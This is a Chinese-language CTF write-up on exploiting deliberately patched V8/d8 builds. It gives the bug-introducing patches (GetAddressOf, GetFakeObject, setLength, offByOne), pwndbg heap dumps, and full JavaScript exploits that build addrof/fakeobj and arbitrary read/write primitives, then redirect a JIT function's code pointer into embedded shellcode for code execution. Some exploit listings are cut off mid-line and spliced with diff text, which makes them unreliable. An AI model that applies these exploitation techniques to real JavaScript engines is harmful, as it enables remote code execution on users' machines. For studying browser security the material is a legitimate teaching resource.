0x5555b79c014e   10e  895a03               movl [rdx+0x3],rbx
0x5555b79c0151   111  894207               movl [rdx+0x7],rax
0x5555b79c0154   114  894a0b               movl [rdx+0xb],rcx
0x5555b79c0157   117  488b45f0             REX.W movq rax,[rbp-0x10]
0x5555b79c015b   11b  8b4017               movl rax,[rax+0x17]
0x5555b79c015e   11e  4903c6               REX.W addq rax,r14
0x5555b79c0161   121  83680704             subl [rax+0x7],0x4
0x5555b79c0165   125  0f8c34000000         jl 0x5555b79c019f  
0x5555b79c016b   12b  488bc2               REX.W movq rax,rdx
0x5555b79c016e   12e  4c8b45e8             REX.W movq r8,[rbp-0x18]
0x5555b79c0172   132  488be5               REX.W movq rsp,rbp
0x5555b79c0175   135  5d                   pop rbp
0x5555b79c0176   136  4983f801             REX.W cmpq r8,0x1
0x5555b79c017a   13a  0f8f03000000         jg 0x5555b79c0183  
0x5555b79c0180   140  c20800               ret 0x8
0x5555b79c0183   143  4159                 pop r9
0x5555b79c0185   145  4a8d24c4             REX.W leaq rsp,[rsp+r8*8]
0x5555b79c0189   149  4151                 push r9
0x5555b79c018b   14b  c3                   retl
0x5555b79c018c   14c  ba50000000           movl rdx,0x50
0x5555b79c0191   151  e8eaa400a0           call 0x5555579ca680  (AllocateInYoungGeneration)    ;; near builtin entry
0x5555b79c0196   156  488bf8               REX.W movq rdi,rax
0x5555b79c0199   159  e9f8feffff           jmp 0x5555b79c0096  
0x5555b79c019e   15e  cc                   int3l
0x5555b79c019f   15f  52                   push rdx
0x5555b79c01a0   160  57                   push rdi
0x5555b79c01a1   161  48be05021c006b360000 REX.W movq rsi,0x366b001c0205    ;; object: 0x366b001c0205 
0x5555b79c01ab   16b  ff75f0               push [rbp-0x10]
0x5555b79c01ae   16e  b801000000           movl rax,0x1
0x5555b79c01b3   173  498d9d404febfe       REX.W leaq rbx,[r13-0x114b0c0]
0x5555b79c01ba   17a  e8015a0aa0           call 0x555557a65bc0  (CEntry_Return1_ArgvOnStack_NoBuiltinExit)    ;; near builtin entry
0x5555b79c01bf   17f  5f                   pop rdi
0x5555b79c01c0   180  5a                   pop rdx
0x5555b79c01c1   181  eba8                 jmp 0x5555b79c016b  
0x5555b79c01c3   183  cc                   int3l
0x5555b79c01c4   184  41ff55d8             call [r13-0x28]

Inlined functions (count = 0)

Deoptimization Input Data (deopt points = 1)
 index  bytecode-offset    pc
     0               -1   184 

Safepoints (entries = 3, byte size = 37, tagged slots = 0, untagged slots = 0)
0x5555b79c007c     3c  num extra spill slots: 0  deopt      0 trampoline:    184
0x5555b79c0196    156  num extra spill slots: 0
0x5555b79c01bf    17f  num extra spill slots: 2  registers: 11

RelocInfo (size = 20)
0x5555b79c004c  near builtin entry
0x5555b79c0052  full embedded object  (0x366b001d42c1 )
0x5555b79c0061  near builtin entry
0x5555b79c0078  near builtin entry
0x5555b79c009a  compressed embedded object  (0x366b000008a9  compressed)
0x5555b79c0140  compressed embedded object  (0x366b001cb821  compressed)
0x5555b79c0192  near builtin entry
0x5555b79c01a3  full embedded object  (0x366b001c0205 )
0x5555b79c01bb  near builtin entry

我们要用到的结构是

shellcode ---+
             
           code ---+
                   
           instruction_start(rwx)

那么我们的策略就是

创建jop-shellcode , 并多次循环达到加热效果
GetAddressOf得到shellcode的压缩指针
读取shellocde的code成员
读取code中的instruction_start(rwx)成员 , 并将其+0x6b后写回
执行shellcode即可rce

EXP

const shellcode = () => {return [
    1.9710255944286777e-246,
    1.971136949489835e-246,
    1.97118242283721e-246,
    1.9711826272864685e-246,
    1.9712937950614383e-246,
    -1.6956275879669133e-231];}
for(let i=0;i& info) {
+  v8::Isolate* isolate = info.GetIsolate();
+
+  if (info.Length() == 0) {
+    isolate->ThrowError("First argument must be provided");
+    return;
+  }
+
+  internal::Handle arg = Utils::OpenHandle(*info[0]);
+  if (!IsHeapObject(*arg)) {
+    isolate->ThrowError("First argument must be a HeapObject");
+    return;
+  }
+  internal::Tagged obj = internal::Cast(*arg);
+
+  uint32_t address = static_cast(obj->address());
+  info.GetReturnValue().Set(v8::Integer::NewFromUnsigned(isolate, address));
+}
+
+void Shell::GetFakeObject(const v8::FunctionCallbackInfo& info) {
+	v8::Isolate *isolate = info.GetIsolate();
+	Local context = isolate->GetCurrentContext();
+
+	if (info.Length() != 1) {
+		isolate->ThrowError("Need exactly one argument");
+		return;
+	}
+
+	Local arg;
+	if (!info[0]->ToUint32(context).ToLocal(&arg)) {
+		isolate->ThrowError("Argument must be a number");
+		return;
+	}
+	
+	uint32_t addr = arg->Value();
+
+	internal::PtrComprCageBase cage_base = internal::GetPtrComprCageBase();
+	internal::Address base_addr = internal::V8HeapCompressionScheme::GetPtrComprCageBaseAddress(cage_base);
+	uint64_t full_addr = base_addr + (uint64_t)addr;
+
+	internal::Tagged obj = internal::HeapObject::FromAddress(full_addr);
+	internal::Isolate *i_isolate = reinterpret_cast(isolate);
+	internal::Handle obj_handle(obj, i_isolate);
+	info.GetReturnValue().Set(ToApiHandle(obj_handle));
+}
+
 void Shell::ModuleResolutionSuccessCallback(
     const FunctionCallbackInfo& info) {
   DCHECK(i::ValidateCallbackInfo(info));
@@ -3364,7 +3410,11 @@ Local Shell::CreateNodeTemplates(
 
 Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
+  global_template->Set(isolate, "GetAddressOf",
+                       FunctionTemplate::New(isolate, GetAddressOf));
+  global_template->Set(isolate, "GetFakeObject",
+                       FunctionTemplate::New(isolate, GetFakeObject));
+/*  global_template->Set(Symbol::GetToStringTag(isolate),
                        String::NewFromUtf8Literal(isolate, "global"));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
@@ -3385,13 +3435,13 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   global_template->Set(isolate, "readline",
                        FunctionTemplate::New(isolate, ReadLine));
   global_template->Set(isolate, "load",
-                       FunctionTemplate::New(isolate, ExecuteFile));
+                       FunctionTemplate::New(isolate, ExecuteFile));*/
   global_template->Set(isolate, "setTimeout",
                        FunctionTemplate::New(isolate, SetTimeout));
   // Some Emscripten-generated code tries to call 'quit', which in turn would
   // call C's exit(). This would lead to memory leaks, because there is no way
   // we can terminate cleanly then, so we need a way to hide 'quit'.
-  if (!options.omit_quit) {
+/*  if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
   global_template->Set(isolate, "testRunner",
@@ -3410,7 +3460,7 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   if (i::v8_flags.expose_async_hooks) {
     global_template->Set(isolate, "async_hooks",
                          Shell::CreateAsyncHookTemplate(isolate));
-  }
+  }*/
 
   return global_template;
 }
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a19d4a0eae4..fbb091afbaf 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -507,6 +507,8 @@ class Shell : public i::AllStatic {
   };
   enum class CodeType { kFileName, kString, kFunction, kInvalid, kNone };
 
+  static void GetAddressOf(const v8::FunctionCallbackInfo& args);
+  static void GetFakeObject(const v8::FunctionCallbackInfo& args);
   static bool ExecuteString(Isolate* isolate, Local source,
                             Local name,
                             ReportExceptions report_exceptions,

增加了两个函数GetAddressOf与GetFakeObject,其中GetAddressOf的实现同 level2

+void Shell::GetFakeObject(const v8::FunctionCallbackInfo& info) {
+	v8::Isolate *isolate = info.GetIsolate();
+	Local context = isolate->GetCurrentContext();
+
+	if (info.Length() != 1) {
+		isolate->ThrowError("Need exactly one argument");
+		return;
+	}
+
+	Local arg;
+	if (!info[0]->ToUint32(context).ToLocal(&arg)) {
+		isolate->ThrowError("Argument must be a number");
+		return;
+	}
+	
+	uint32_t addr = arg->Value();
+
+	internal::PtrComprCageBase cage_base = internal::GetPtrComprCageBase();
+	internal::Address base_addr = internal::V8HeapCompressionScheme::GetPtrComprCageBaseAddress(cage_base);
+	uint64_t full_addr = base_addr + (uint64_t)addr;
+
+	internal::Tagged obj = internal::HeapObject::FromAddress(full_addr);
+	internal::Isolate *i_isolate = reinterpret_cast(isolate);
+	internal::Handle obj_handle(obj, i_isolate);
+	info.GetReturnValue().Set(ToApiHandle(obj_handle));
+}

参数为一个数字

将这个数字加上cage_base后无条件当作double_arrray_obj返回

obj结构

回顾一下

pwndbg> x/wx 0x367c00042c64
0x367c00042c64:	0x001cafa5(map)
pwndbg> 
0x367c00042c68:	0x00000725(properties)
pwndbg> 
0x367c00042c6c:	0x001d3695(elements)
pwndbg> 
0x367c00042c70:	0x00000008(lenth)

map用来标记obj的形状 : 是什么类型的obj, 有什么内联/外联属性…

properties是存放外联属性, 比如obj.first , obj.second…

elements是元素指针, 指向存放obj[0],obj[1]…的真实地址

lenth是obj元素的个数

fakeobj

我们要伪造一个obj , 最低限度是需要伪造这四个成员

map很好得到, 我们可以随便读取一个double_array.map的压缩指针就可以直接拿来用

properties在这里没有必要用, 直接填0x725就可以了

element是重点 , 如果我们可以控制element为address-8(减去了element的头部数据: element的map和lenth成员) , 就可以使用obj[0]这样的形式向address写入任意内容(这里的address也是压缩指针, 但是写入的内容是八字节)

lenth随便填一个数就可以了, 一边任意地址写也不需要很长

堆风水

这四个成员可以写在一个double_array中 , 使用 GetAddressOf(array)+offset获得element(也就是fake_obj的地址)

风水可以这样堆

然后就可以写出aar/aaw原语, 后续的做法就和 Level 2 一样了

EXP

//prepare
var f64 = new Float64Array(1);
var u64 = new BigUint64Array(f64.buffer);
var u32 = new Uint32Array(f64.buffer);
function i2f(i){u64[0]=BigInt(i);return f64[0];}
function f2i(i){f64[0]=i;return u64[0];}
function u2f(low,hig){u32[0]=low;u32[1]=hig;return f64[0];}
function f2l(i){f64[0]=i;return u32[0];}
function i2l(i){u64[0]=i;return u32[0];}
const shellcode = () => {return [
    1.9710255944286777e-246,
    1.971136949489835e-246,
    1.97118242283721e-246,
    1.9711826272864685e-246,
    1.9712937950614383e-246,
    -1.6956275879669133e-231];}
for(let i=0;i(length) otherwise ErrorLabel;
+      const array: JSArray = Cast(receiver) otherwise ErrorLabel;
+      array.length = len;
+    } label ErrorLabel {
+        Print("Nope");
+    }
+    return receiver;
+}
+}
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index facf0d86d79..382c015bc48 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -3364,7 +3364,7 @@ Local Shell::CreateNodeTemplates(
 
 Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
+/*  global_template->Set(Symbol::GetToStringTag(isolate),
                        String::NewFromUtf8Literal(isolate, "global"));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
@@ -3385,13 +3385,13 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   global_template->Set(isolate, "readline",
                        FunctionTemplate::New(isolate, ReadLine));
   global_template->Set(isolate, "load",
-                       FunctionTemplate::New(isolate, ExecuteFile));
+                       FunctionTemplate::New(isolate, ExecuteFile));*/
   global_template->Set(isolate, "setTimeout",
                        FunctionTemplate::New(isolate, SetTimeout));
   // Some Emscripten-generated code tries to call 'quit', which in turn would
   // call C's exit(). This would lead to memory leaks, because there is no way
   // we can terminate cleanly then, so we need a way to hide 'quit'.
-  if (!options.omit_quit) {
+/*  if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
   global_template->Set(isolate, "testRunner",
@@ -3410,7 +3410,7 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   if (i::v8_flags.expose_async_hooks) {
     global_template->Set(isolate, "async_hooks",
                          Shell::CreateAsyncHookTemplate(isolate));
-  }
+  }*/
 
   return global_template;
 }
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index 48249695b7b..f3379ac47ec 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -2531,6 +2531,8 @@ void Genesis::InitializeGlobal(Handle global_object,
     JSObject::AddProperty(isolate_, proto, factory->constructor_string(),
                           array_function, DONT_ENUM);
 
+    SimpleInstallFunction(isolate_, proto, "setLength",
+                          Builtin::kArrayPrototypeSetLength, 1, true);
     SimpleInstallFunction(isolate_, proto, "at", Builtin::kArrayPrototypeAt, 1,
                           true);
     SimpleInstallFunction(isolate_, proto, "concat",

只增加了一个函数setLength

+namespace array {
+transitioning javascript builtin
+ArrayPrototypeSetLength(
+  js-implicit context: NativeContext, receiver: JSAny)(length: JSAny): JSAny {
+    try {
+      const len: Smi = Cast(length) otherwise ErrorLabel;
+      const array: JSArray = Cast(receiver) otherwise ErrorLabel;
+      array.length = len;
+    } label ErrorLabel {
+        Print("Nope");
+    }
+    return receiver;
+}
+}

将二参写入this指针指向的obj的lenth成员

也就是无限长度的堆溢出

obj成员

我们能无限长度堆溢出 , 也就是可以篡改相邻obj的所有成员

pwndbg> x/wx 0x367c00042c64
0x367c00042c64:	0x001cafa5(map)
pwndbg> 
0x367c00042c68:	0x00000725(properties)
pwndbg> 
0x367c00042c6c:	0x001d3695(elements)
pwndbg> 
0x367c00042c70:	0x00000008(lenth)

直接篡改element就可以达成如Level 3一样的aar/aaw

而GetAddressOf则可以靠堆溢出到一个obj_array的element的成员使用越界读直接获取

问题就被转化为Level 2了

堆风水

我们的理想情况是这些obj和它们的element成员都是相邻的

不过就算中间隔了几个幽灵obj也没关系, 反正堆溢出长度无限 ,gdb调试一下计算对偏移就好

EXP

var f64 = new Float64Array(1);
var u64 = new BigUint64Array(f64.buffer);
var u32 = new Uint32Array(f64.buffer);
function i2f(i){u64[0]=BigInt(i);return f64[0];}
function f2i(i){f64[0]=i;return u64[0];}
function u2f(low,hig){u32[0]=low;u32[1]=hig;return f64[0];}
function u2i(low,hig){u32[0]=low;u32[1]=hig;return u64[0];}
function f2l(i){f64[0]=i;return u32[0];}
function i2l(i){u64[0]=i;return u32[0];}
function f2h(i){f64[0]=i;return u32[1];}
function i2h(i){u64[0]=i;return u32[1];}
//function bug(){%SystemBreak();}
//function peek(obj){%DebugPrint(obj);}
function log(msg){console.log(msg);}
//prepare
const shellcode = () => {return [
    1.9710255944286777e-246,
    1.971136949489835e-246,
    1.97118242283721e-246,
    1.9711826272864685e-246,
    1.9712937950614383e-246,
    -1.6956275879669133e-231];}
for(let i=0;ifactory()->NewNumberFromUint((new_length));
 }
 
+BUILTIN(ArrayOffByOne) {
+	HandleScope scope(isolate);
+	Factory *factory = isolate->factory();
+	Handle receiver = args.receiver();
+
+	if (!IsJSArray(*receiver) || !HasOnlySimpleReceiverElements(isolate, Cast(*receiver))) {
+	  THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+    	factory->NewStringFromAsciiChecked("Nope")));
+	}
+
+	Handle array = Cast(receiver);
+
+	ElementsKind kind = array->GetElementsKind();
+
+	if (kind != PACKED_DOUBLE_ELEMENTS) {
+	  THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+    	factory->NewStringFromAsciiChecked("Need an array of double numbers")));
+	}
+
+	if (args.length() > 2) {
+	  THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+    	factory->NewStringFromAsciiChecked("Too many arguments")));
+	}
+	
+	Handle elements(Cast(array->elements()), isolate);
+	uint32_t len = static_cast(Object::NumberValue(array->length()));
+	if (args.length() == 1) {	// read mode
+		return *(isolate->factory()->NewNumber(elements->get_scalar(len)));
+	} else {	// write mode
+		Handle value = args.at(1);
+		if (!IsNumber(*value)) {
+		  THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly,
+    		factory->NewStringFromAsciiChecked("Need a number argument")));
+		}
+		double num = static_cast(Object::NumberValue(*value));
+		elements->set(len, num);
+		return ReadOnlyRoots(isolate).undefined_value();
+	}
+}
+
 namespace {
 
 V8_WARN_UNUSED_RESULT Tagged GenericArrayPop(Isolate* isolate,
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 78cbf8874ed..8a0bd959a29 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -394,6 +394,7 @@ namespace internal {
       ArraySingleArgumentConstructor)                                          \
   TFC(ArrayNArgumentsConstructor, ArrayNArgumentsConstructor)                  \
   CPP(ArrayConcat)                                                             \
+  CPP(ArrayOffByOne)                                                           \
   /* ES6 #sec-array.prototype.fill */                                          \
   CPP(ArrayPrototypeFill)                                                      \
   /* ES7 #sec-array.prototype.includes */                                      \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index 9a346d134b9..ce31f92b876 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1937,6 +1937,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
       return Type::Receiver();
     case Builtin::kArrayUnshift:
       return t->cache_->kPositiveSafeInteger;
+	case Builtin::kArrayOffByOne:
+	  return Type::Receiver();
 
     // ArrayBuffer functions.
     case Builtin::kArrayBufferIsView:
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index facf0d86d79..382c015bc48 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -3364,7 +3364,7 @@ Local Shell::CreateNodeTemplates(
 
 Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
+/*  global_template->Set(Symbol::GetToStringTag(isolate),
                        String::NewFromUtf8Literal(isolate, "global"));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
@@ -3385,13 +3385,13 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   global_template->Set(isolate, "readline",
                        FunctionTemplate::New(isolate, ReadLine));
   global_template->Set(isolate, "load",
-                       FunctionTemplate::New(isolate, ExecuteFile));
+                       FunctionTemplate::New(isolate, ExecuteFile));*/
   global_template->Set(isolate, "setTimeout",
                        FunctionTemplate::New(isolate, SetTimeout));
   // Some Emscripten-generated code tries to call 'quit', which in turn would
   // call C's exit(). This would lead to memory leaks, because there is no way
   // we can terminate cleanly then, so we need a way to hide 'quit'.
-  if (!options.omit_quit) {
+/*  if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
   global_template->Set(isolate, "testRunner",
@@ -3410,7 +3410,7 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
   if (i::v8_flags.expose_async_hooks) {
     global_template->Set(isolate, "async_hooks",
                          Shell::CreateAsyncHookTemplate(isolate));
-  }
+  }*/
 
   return global_template;
 }
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index 48249695b7b..99dc014c13c 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -2533,6 +2533,8 @@ void Genesis::InitializeGlobal(Handle global_object,
 
     SimpleInstallFunction(isolate_, proto, "at", Builtin::kArrayPrototypeAt, 1,
                           true);
+    SimpleInstallFunction(isolate_, proto, "offByOne",
+                          Builtin::kArrayOffByOne, 1, false);
     SimpleInstallFunction(isolate_, proto, "concat",
                           Builtin::kArrayPrototypeConcat, 1, false);
     SimpleInstallFunction(isolate_, proto, "copyWithin",

提供了方法offByOne

当传入一个参数时 , 会越界8字节读取

当传入两个参数时, 会越界写入8字节

也就是方法的名字OffByOne , 在x64pwn中的offbyone可以用来修改chunk_size

在v8中 , OffByOne 可以覆盖的成员为map和properties

Map

我们说过, map是用来记录一个obj的类型的(是浮点数组还是对象数组?有什么外联属性?)

如果我们obj_array的map修改为double_array , 就可以以浮点数形式读取obj的压缩指针
这样就可以实现 GetAddressOf
如果我们将double_array的map修改为obj_array的map , 就可以将浮点数的高/低32位作为压缩指针取出
也就是实现了GetFakeObj

有了这两个原语, 就变回了Level 3

但是这样利用的前提就是array1.element和array2的紧邻的

//jit
var a=[1.2,1.3];
var b=[a,a];
peek(a);
peek(b);
bug();

对于这样构造的两个数组

pwndbg> job 0xe0a00119bf9
0xe0a00119bf9: [JSArray]
 - map: 0x0e0a001cb821  [FastProperties]
 - prototype: 0x0e0a001cb179 
 - elements: 0x0e0a00119c11  [PACKED_DOUBLE_ELEMENTS]
 - length: 2
 - properties: 0x0e0a00000725 
 - All own properties (excluding elements): {
    0xe0a00000d99: [String] in ReadOnlySpace: #length: 0x0e0a00025fed , data= 0x0e0a00000069 > (const accessor descriptor, attrs: [W__]), location: descriptor
 }
 - elements: 0x0e0a00119c11  {
           0: 1.2
           1: 1.3
 }
pwndbg> x/wx 0x0e0a00119c11-1
0xe0a00119c10:	0x000008a9
pwndbg> 
0xe0a00119c14:	0x00000004
pwndbg> 
0xe0a00119c18:	0x33333333
pwndbg> 
0xe0a00119c1c:	0x3ff33333
pwndbg> 
0xe0a00119c20:	0xcccccccd
pwndbg> 
0xe0a00119c24:	0x3ff4cccc
pwndbg> 
0xe0a00119c28:	0x0000056d
pwndbg> 
0xe0a00119c2c:	0x00000004
pwndbg> 
0xe0a00119c30:	0x00000000
pwndbg> 
0xe0a00119c34:	0x00000000
pwndbg> job 0xe0a00119c28+1
0xe0a00119c29: [FixedArray]
 - map: 0x0e0a0000056d 
 - length: 2
         0-1: 0

可以发现和a.element紧邻的对象居然是一个幽灵obj (如果有知道为什么的师傅可以麻烦告诉我一下吗, 谢谢了otz)

我找到的方法是

//jit
var a=[1.2,1.3];
var b=new Array(a,a);
peek(a);
peek(b);
bug();

这样a.element就紧贴着b, 可以修改b的map

pwndbg> job 0x375a00119bf9
0x375a00119bf9: [JSArray]
 - map: 0x375a001cb821  [FastProperties]
 - prototype: 0x375a001cb179 
 - elements: 0x375a00119c11  [PACKED_DOUBLE_ELEMENTS]
 - length: 2
 - properties: 0x375a00000725 
 - All own properties (excluding elements): {
    0x375a00000d99: [String] in ReadOnlySpace: #length: 0x375a00025fed , data= 0x375a00000069 > (const accessor descriptor, attrs: [W__]), location: descriptor
 }
 - elements: 0x375a00119c11  {
           0: 1.2
           1: 1.3
 }
pwndbg> x/wx 0x375a00119c11-1
0x375a00119c10:	0x000008a9
pwndbg> 
0x375a00119c14:	0x00000004
pwndbg> 
0x375a00119c18:	0x33333333
pwndbg> 
0x375a00119c1c:	0x3ff33333
pwndbg> 
0x375a00119c20:	0xcccccccd
pwndbg> 
0x375a00119c24:	0x3ff4cccc
pwndbg> 
0x375a00119c28:	0x001cb8a1
pwndbg> job 0x375a00119c28+1
0x375a00119c29: [JSArray]
 - map: 0x375a001cb8a1  [FastProperties]
 - prototype: 0x375a001cb179 
 - elements: 0x375a00119c41  [PACKED_ELEMENTS]
 - length: 2
 - properties: 0x375a00000725 
 - All own properties (excluding elements): {
    0x375a00000d99: [String] in ReadOnlySpace: #length: 0x375a00025fed , data= 0x375a00000069 > (const accessor descriptor, attrs: [W__]), location: descriptor
 }
 - elements: 0x375a00119c41  {
         0-1: 0x375a00119bf9 
 }

double_array_map和obj_array_map可以直接拿从gdb里来用(不太稳定就是了, 不过跑个七八次也能rce)

properties

本题的正解是修改外联属性指针

基础原理阅读这里 : https://v8.dev/blog/elements-kinds

当obj没有外联属性成员时 , properties为一个固定的压缩指针0x725

当拥有了成员后 , properties会来到obj的附近

也就是我们可以通过越界读properties , 加减偏移得到obj的地址

这之后修改properties就可以实现小范围内的任意地址写 , 如果修改a的lenth成员就变回了Level 4了

但是这个除了要求a.element和obj相邻, 而且要求obj拥有一个smi的外联属性

堆风水

这里的堆风水就比较简单了, 直接如下创建即可满足相邻的条件

1
2
3

var a = [1.1];
var obj = {in:1};
obj.first=0x100;

EXP1(map)

var f64 = new Float64Array(1);
var u64 = new BigUint64Array(f64.buffer);
var u32 = new Uint32Array(f64.buffer);
function i2f(i){u64[0]=BigInt(i);return f64[0];}
function f2i(i){f64[0]=i;return u64[0];}
function u2f(low,hig){u32[0]=low;u32[1]=hig;return f64[0];}
function u2i(low,hig){u32[0]=low;u32[1]=hig;return u64[0];}
function f2l(i){f64[0]=i;return u32[0];}
function i2l(i){u64[0]=i;return u32[0];}
function f2h(i){f64[0]=i;return u32[1];}
function i2h(i){u64[0]=i;return u32[1];}
//function bug(){%SystemBreak();}
//function peek(obj){%DebugPrint(obj);console.log("\n\n\n------------------------------------------------------------------------\n\n\n");}
function log(msg){console.log(msg.toString(16));console.log("\n------------------------------------------------------------------------\n");}
function Read(obj){return f2i(obj.offByOne());}
function Write(obj,val){obj.offByOne(val);}
function shellcode() {
    return [1.9995716422075807e-246, 
    1.9710255944286777e-246, 
    1.97118242283721e-246, 
    1.971136949489835e-246, 
    1.9711826272869888e-246, 
    1.9711829003383248e-246, 
    -9.254983612527998e+61];
}
for(let i=0;i<1000;i++){shellcode();} 
var tmp =[shellcode,shellcode];
var a = [1.5,1.3];
var b = new Array(a,a);
var f_head=0x00000725001cb821;
var o_head=0x00000725001cb8a1;//0x00000725001cb8a1
//Write(a,i2f(head));
function GetAddressOf(obj){b[0]=obj;Write(a,i2f(f_head));let tmp=b[0];Write(a,i2f(o_head));return f2l(tmp);}
function FakeObj(address){Write(a,i2f(f_head));b[0]=u2f(address,address);Write(a,i2f(o_head));return b[1];}
sc =GetAddressOf(shellcode);
var sh = FakeObj(sc);
//Write(a,i2f(f_head));
//b[0]=u2f(sc,sc);
//Write(a,i2f(o_head));
//var sh=b[0];

var c=[i2f(f_head),u2f(0,0x100)];
var c_addr=GetAddressOf(c);
fake=c_addr+0x64;
//var fake_obj=FakeObj(fake);
Write(a,i2f(f_head));
b[0]=u2f(fake,fake);
Write(a,i2f(o_head));
var fake_obj=b[0];
function aar(address){c[1]=u2f(address-8,0x100);return f2i(fake_obj[0]);}
function aaw(address,val){c[1]=u2f(address-8,0x100);fake_obj[0]=i2f(val);}
sc =GetAddressOf(shellcode);
code = i2l(aar(sc+0xc));
rwx = aar(code+0x14);
log(rwx);
aaw(code+0x14,rwx+0x6bn);

//peek(shellcode);
//bug();
shellcode();

EXP2(properties)

var f64 = new Float64Array(1);
var u64 = new BigUint64Array(f64.buffer);
var u32 = new Uint32Array(f64.buffer);
function i2f(i){u64[0]=BigInt(i);return f64[0];}
function f2i(i){f64[0]=i;return u64[0];}
function u2f(low,hig){u32[0]=low;u32[1]=hig;return f64[0];}
function u2i(low,hig){u32[0]=low;u32[1]=hig;return u64[0];}
function f2l(i){f64[0]=i;return u32[0];}
function i2l(i){u64[0]=i;return u32[0];}
function f2h(i){f64[0]=i;return u32[1];}
function i2h(i){u64[0]=i;return u32[1];}
//function bug(){%SystemBreak();}
//function peek(obj){%DebugPrint(obj);console.log("\n\n\n------------------------------------------------------------------------\n\n\n");}
function log(msg){console.log(msg.toString(16));console.log("\n------------------------------------------------------------------------\n");}
//offByOne:method
function Read(obj){return f2i(obj.offByOne());}
function Write(obj,val){obj.offByOne(val);}
function shellcode() {
    return [1.9995716422075807e-246, 
    1.9710255944286777e-246, 
    1.97118242283721e-246, 
    1.971136949489835e-246, 
    1.9711826272869888e-246, 
    1.9711829003383248e-246, 
    -9.254983612527998e+61];
}
for(let i=0;i<0x10000;i++){shellcode();}
//------------------------------------------------------//
var a = [1.1];
var obj = {in:1};
obj.first=0x100;
var c =[1.2];
var head = Read(a);
obj_map = i2l(head);
obj_pro = i2h(head);
a_addr = obj_pro-0x7c;
a_len = a_addr+0xc;
a_ele_len = a_addr+0x1c;
//-------------------------------------------------------//
Write(a,u2f(obj_map,a_ele_len-8));
obj.first=0x100;
Write(a,u2f(obj_map,a_len-8));
obj.first=0x100;
//-------------------------------------------------------//
f_map=f2l(a[0x10]);
f_pro=f2h(a[0x10]);
//--------------------------------------------------------//
var Obj =[a];
Obj_map =f2l(a[0x2a]);
Obj_pro =f2h(a[0x2a]);
//a[0x2a] = u2f(f_map,Obj_pro);
function GetAddressOf(obj){Obj[0]=obj;a[0x2a] = u2f(f_map,Obj_pro);var tmp=Obj[0];a[0x2a] = u2f(Obj_map,Obj_pro);return f2l(tmp);}
function aar(addr){a[0x11]=u2f(addr-8,0x20);return f2i(c[0]);}
function aaw(addr,val){a[0x11]=u2f(addr-8,0x20);c[0]=i2f(val);}
sc = GetAddressOf(shellcode);
code = i2l(aar(sc+0xc));
rwx = aar(code+0x14);
aaw(code+0x14,rwx+0x6bn);
//bug();
shellcode();

先更这么多 , 会尽快更新完的